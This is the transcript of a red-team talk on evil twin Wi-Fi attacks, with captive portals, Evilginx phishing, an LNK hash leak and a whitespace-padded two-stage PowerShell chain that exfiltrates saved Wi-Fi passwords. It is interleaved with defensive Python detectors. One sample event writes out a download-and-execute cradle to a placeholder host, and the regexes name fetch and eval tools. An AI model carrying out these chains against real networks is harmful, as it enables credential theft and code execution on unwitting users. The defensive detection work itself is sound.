Evil Twin Techniques For Real World Exploitation

Harold Rodriguez
August 29, 2025

Most people think of Evil Twin attacks as just fake login pages, but that's only scratching the surface. This talk dives into advanced techniques that go beyond basic credential phishing, showcasing how they can be weaponized for high-impact attacks. We'll explore the tooling, infrastructure, and attack chains needed to execute these scenarios in red team operations or simulated environments.

Video demos can be found here:

Captive Portal Demo: https://youtu.be/2sQsXhqilu4
Fake Login Demo: https://youtu.be/E8mF5vzhXps
Reverse Proxy Phishing: https://youtu.be/-sScJwWIf40
Drive By Download: https://youtu.be/B9HR-T6SnZA
User Assisted Code Execution: https://youtu.be/j-OBILl5I5E


Transcript

  1. About Me
     • Harold Rodriguez “superkojiman”
     • Penetration tester, red team operator, security researcher
     • Hacking the planet since ~2010
  2. Today’s Talk
     • The “what” and “how” of evil twin attacks
     • Demonstrate attacks for real world exploitation
     • Walkthrough on how to set up the attacks on your own
  3. Evil-What Now?
     A rogue access point impersonating a trusted network to lure a station (laptop, smartphone, IoT device, etc.) into connecting to it.
  4. How It Works
     A station that connects to a Wi-Fi network can store the network’s SSID so it can connect to it again automatically when it comes back into range. When out of range of a trusted Wi-Fi network, the station will do one of two things:
     • Actively scan for a known SSID
     • Passively listen for access points broadcasting a known SSID
  5. Active Scanning
     The station actively sends probe request frames to nearby access points, searching for any that match SSIDs it previously connected to. If it finds one, it connects to it.
  6. Passive Scanning
     The station passively listens for beacon frames broadcast by access points that contain an SSID the station previously connected to. If it receives one, it connects to it.
  7. The Attack
     If an attacker knows an SSID the station trusts, they can broadcast that SSID and trick the station into connecting to it.
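The condition slides 4 to 7 describe (a trusted SSID re-broadcast by a radio the organization does not own) is exactly what a wireless IDS looks for. The following is an added example, not code from the talk: it parses constructed scan output and compares each beacon against a hypothetical inventory of authorized access points, flagging a corporate SSID advertised from an unknown BSSID, advertised with a different security type than the real network uses, or a single unknown radio advertising several corporate SSIDs at once. The inventory, BSSIDs and scan lines are all assumptions made for the example.

```python
"""Evil-twin detection from a wireless scan (added example, not from the talk).

A trusted SSID being advertised by a BSSID that is not in the organization's
AP inventory, or with a different security type than the real network uses,
is the signature of the rogue AP described in the slides. The inventory below
is a hypothetical allowlist and the scan lines are constructed for this example.
"""
from collections import defaultdict

# Hypothetical authorized AP inventory: SSID -> (expected security, authorized BSSIDs)
AUTHORIZED_APS = {
    "WTFCorp_Guest": ("OPEN", {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}),
    "WTFCorp_Staff": ("WPA2", {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}),
}

# Constructed scan output, one beacon per line: bssid,ssid,channel,security,signal_dbm
SCAN_LINES = """\
00:11:22:aa:bb:01,WTFCorp_Guest,6,OPEN,-55
00:11:22:aa:bb:02,WTFCorp_Staff,11,WPA2,-60
b8:27:eb:12:34:56,WTFCorp_Guest,1,OPEN,-30
b8:27:eb:12:34:56,WTFCorp_Staff,1,OPEN,-30
aa:bb:cc:dd:ee:ff,CoffeeShop,6,OPEN,-70
"""


def parse_scan(text):
    """Parse the CSV-like scan lines into a list of beacon dicts."""
    beacons = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        bssid, ssid, channel, security, signal = line.split(",")
        beacons.append({
            "bssid": bssid.lower(),
            "ssid": ssid,
            "channel": int(channel),
            "security": security.upper(),
            "signal": int(signal),
        })
    return beacons


def find_evil_twins(beacons, inventory=AUTHORIZED_APS):
    """Return (ssid, bssid, reason) for beacons that impersonate an inventoried SSID."""
    findings = []
    for b in beacons:
        if b["ssid"] not in inventory:
            continue  # not one of ours: nothing to compare against
        expected_security, authorized_bssids = inventory[b["ssid"]]
        reasons = []
        if b["bssid"] not in authorized_bssids:
            reasons.append("unknown BSSID")
        if b["security"] != expected_security:
            reasons.append(f"security {b['security']} != expected {expected_security}")
        if reasons:
            findings.append((b["ssid"], b["bssid"], "; ".join(reasons)))
    return findings


def _all_authorized(inventory):
    """Every BSSID that appears anywhere in the inventory."""
    return set().union(*(bssids for _, bssids in inventory.values()))


def multi_ssid_bssids(beacons, inventory=AUTHORIZED_APS, threshold=2):
    """An unknown radio advertising several inventoried SSIDs at once is a second
    rogue-AP indicator; authorized radios are excluded because real APs legitimately
    host more than one SSID."""
    ssids_by_bssid = defaultdict(set)
    for b in beacons:
        if b["ssid"] in inventory:
            ssids_by_bssid[b["bssid"]].add(b["ssid"])
    known = _all_authorized(inventory)
    return {bssid: sorted(ssids) for bssid, ssids in ssids_by_bssid.items()
            if bssid not in known and len(ssids) >= threshold}


if __name__ == "__main__":
    beacons = parse_scan(SCAN_LINES)
    for ssid, bssid, reason in find_evil_twins(beacons):
        print(f"ALERT {ssid} from {bssid}: {reason}")
    for bssid, ssids in multi_ssid_bssids(beacons).items():
        print(f"ALERT {bssid} advertises multiple corporate SSIDs: {ssids}")
```

The security-type check matters for the station side of the story as well: a client that has saved an open SSID will join any radio that beacons that name, so the cheapest client-side mitigation is to turn off automatic connection for open networks and remove stale open profiles.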
  8. Captive Portals
     Displayed after a station connects to a Wi-Fi network, but before it has Internet access. Purpose:
     • Require user to accept terms and conditions
     • Require payment for Internet access
     • Require user to provide authentication
  9. Attack Scenario
     Target:
     • Alice
     • Works at Whistler, Turnbull & Fisher Corp.
     • Email: [email protected]
     Device:
     • Windows 11 Pro 24H2
     • Defender antivirus updated August 21, 2025
     • Trusts open Wi-Fi network WTFCorp_Guest
  10. Software And Hardware
     Software:
     • Linux (Kali, Ubuntu, etc.)
     • hostapd
     • dnsmasq
     • Web server (lighttpd, nginx, apache)
     Hardware:
     • Portable computer (laptop, Raspberry Pi)
     • Power bank
     • Wi-Fi adapter
  11. hostapd
     Enables the wireless interface wlan1 to act as an access point. This will broadcast the SSID the station trusts to trick it into connecting to the Pi.
  12. dnsmasq
     Assigns an IP address to the station and overrides DNS resolution for msftconnecttest.com so it resolves to the web server running on the Pi.
  13. lighttpd
     Create a file connecttest.txt in the web root with any content other than “Microsoft Connect Test”. This will force Windows to trigger the captive portal flow.
  14. lighttpd
     Rewrite rule that redirects requests to http://msftconnecttest.com/redirect to the captive portal landing page at http://10.11.12.1/index.html
  15. lighttpd
     The captive portal landing page serves the attacker’s payload to the browser: either a fake login page hosted on the evil twin, or elsewhere on the Internet.
  16. IP Forwarding
     • The Pi’s primary wireless interface (wlan0) is connected to the Internet
     • Forward connections from wlan1 to wlan0
  17. Reverse Proxy Phishing
     • Set up an Evilginx server with a domain that looks trustworthy
     • Configure an Evilginx phishlet and create a lure
  18. Drive By Download
     • Create a LNK file pointing to the IP address of the Pi, and package it into a ZIP archive
     • ZIP extraction triggers SMB-based NTLMv2 hash leak to the Pi
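The hash leak in slide 18 only happens because the station is willing to open an SMB session to whatever host the LNK names, and that session is visible on the wire as a TCP/445 (or 139) connection to a destination that is not a file server. The following is an added example, not code from the talk: it runs a detection over constructed network-connection events in a Sysmon Event ID 3-like layout and flags SMB sessions to any host outside a hypothetical allowlist of approved file servers. The approved-server addresses, the workstation addresses and the event lines are assumptions made for the example; 10.11.12.1 is the Pi address from the slides.

```python
"""Outbound SMB detection over network-connection telemetry (added example,
not from the talk).

Opening the folder that contains the extracted .lnk makes the Windows SMB
redirector connect to the host named in the shortcut, and the NTLM
challenge-response is exchanged on that connection. Network-side, that is a
TCP/445 or TCP/139 session to a destination that is not an approved file
server. Event lines are constructed in a Sysmon Event ID 3-like layout and
the allowlist is hypothetical.
"""
import ipaddress
import re

# Hypothetical: the only hosts workstations should ever speak SMB to
APPROVED_SMB_SERVERS = {"10.0.1.10", "10.0.1.11"}

# RFC 1918 ranges; checked explicitly rather than via ip_address.is_private so
# that documentation ranges such as 203.0.113.0/24 count as public here.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed events: timestamp image src_ip:port -> dst_ip:port
NET_EVENTS = """\
2025-08-29T10:15:01Z System 10.0.5.23:51234 -> 10.0.1.10:445
2025-08-29T10:15:07Z System 10.0.5.23:51240 -> 203.0.113.10:445
2025-08-29T10:15:09Z msedge.exe 10.0.5.23:51241 -> 203.0.113.10:443
2025-08-29T10:16:30Z System 192.168.137.45:49800 -> 10.11.12.1:445
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<image>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)"
    r"\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def is_rfc1918(ip):
    """True when the address lies in one of the private IPv4 ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse_events(text):
    """Turn the constructed log lines into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["sport"] = int(e["sport"])
        e["dport"] = int(e["dport"])
        events.append(e)
    return events


def suspicious_smb(events, approved=APPROVED_SMB_SERVERS):
    """Return (timestamp, destination, reason) for SMB sessions to hosts that
    are not approved file servers. The SMB redirector runs inside the System
    process, so the image name carries no signal; the destination does."""
    findings = []
    for e in events:
        if e["dport"] not in (445, 139) or e["dst"] in approved:
            continue
        if is_rfc1918(e["dst"]):
            reason = "SMB to unapproved internal host"
        else:
            reason = "SMB to public address (NTLM hash leak indicator)"
        findings.append((e["ts"], e["dst"], reason))
    return findings


if __name__ == "__main__":
    for ts, dst, reason in suspicious_smb(parse_events(NET_EVENTS)):
        print(f"{ts} ALERT {reason}: {dst}")
```

Because the redirector connects as System, the useful controls are on the network and in NTLM policy rather than on the process: blocking outbound TCP/445 at the perimeter and in the Windows Firewall public profile stops the session, and the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy stops the credential exchange even when the session is allowed.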
  19. Drive By Download
     Some observations using the default configuration of Edge, Chrome, and Firefox.
     HTTPS 🔒
     • Edge, Chrome, and Firefox will download the file automatically
     HTTP 🔓
     • Edge and Firefox will download the file automatically
     • Chrome will ask for additional confirmation from the user
  20. User-Assisted Code Execution
     The Run dialog is limited to 259 characters, so a two-stage payload is required.
     • Stage 1 is copied to the clipboard and is a PowerShell command to download the Stage 2 payload from the Pi
  21. User-Assisted Code Execution
     The Stage 1 payload can be padded with spaces to hide the payload when the user pastes it into the Run dialog.
  22. User-Assisted Code Execution
     The Stage 2 payload uses netsh to retrieve saved SSIDs and passwords, and sends them to the Pi.
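Slides 20 to 22 leave three distinct marks in endpoint telemetry: explorer.exe (the process behind the Run dialog) spawning a shell whose command line contains a download-and-execute cradle, a command line padded with a long run of spaces, and netsh being asked for wireless profiles with key=clear. The following is an added example, not code from the talk: it applies those three rules to constructed process-creation events in a Sysmon Event ID 1-like layout. The event timestamps, paths and command lines are constructed, and EXAMPLE-PI in the sample cradle is a placeholder host name.

```python
"""Process-creation rules for the two-stage Run-dialog chain and the Wi-Fi
profile dump (added example, not from the talk).

Events are constructed in a Sysmon Event ID 1-like layout:
(timestamp, parent image, image, command line). EXAMPLE-PI is a placeholder.
"""
import re

PROC_EVENTS = [
    ("2025-08-29T11:02:10Z",
     r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -w hidden -c "iwr http://EXAMPLE-PI/stage2.ps1 | iex"'
     + " " * 120 + "# verification code 4829"),
    ("2025-08-29T11:02:12Z",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\netsh.exe",
     'netsh wlan show profile name="WTFCorp_Staff" key=clear'),
    ("2025-08-29T11:05:00Z",
     r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\notepad.exe",
     "notepad.exe notes.txt"),
    ("2025-08-29T11:06:00Z",
     r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\netsh.exe",
     "netsh wlan show profile"),
]

# Download-and-execute: a fetch primitive followed somewhere later by an eval primitive
CRADLE_RE = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|curl|wget)\b"
    r".*\b(iex|invoke-expression)\b",
    re.IGNORECASE,
)
# 20+ consecutive spaces: the padding that pushes the real command out of the dialog's view
PADDING_RE = re.compile(r" {20,}")
# Saved-profile export including the passphrase
WLAN_KEY_RE = re.compile(r"netsh\s+wlan\s+show\s+profile.*\bkey\s*=\s*clear\b", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names an event triggers (empty if nothing fired)."""
    _ts, parent, image, cmdline = event
    hits = []
    if basename(parent) == "explorer.exe" and basename(image) in SHELLS:
        if CRADLE_RE.search(cmdline):
            hits.append("download cradle launched from explorer.exe (Run dialog)")
        if PADDING_RE.search(cmdline):
            hits.append("whitespace-padded command line")
    if basename(image) == "netsh.exe" and WLAN_KEY_RE.search(cmdline):
        hits.append("Wi-Fi profile export with key=clear")
    return hits


def scan(events):
    """Apply evaluate() to every event and keep the ones that triggered."""
    results = []
    for event in events:
        hits = evaluate(event)
        if hits:
            results.append((event[0], basename(event[2]), hits))
    return results


if __name__ == "__main__":
    for ts, image, hits in scan(PROC_EVENTS):
        print(f"{ts} {image}: {'; '.join(hits)}")
```

The plain `netsh wlan show profile` in the last sample event is deliberately left unflagged: listing profile names is routine, and the signal is the key=clear export. For incident response, what the user pasted also survives in the RunMRU registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside the process-creation events.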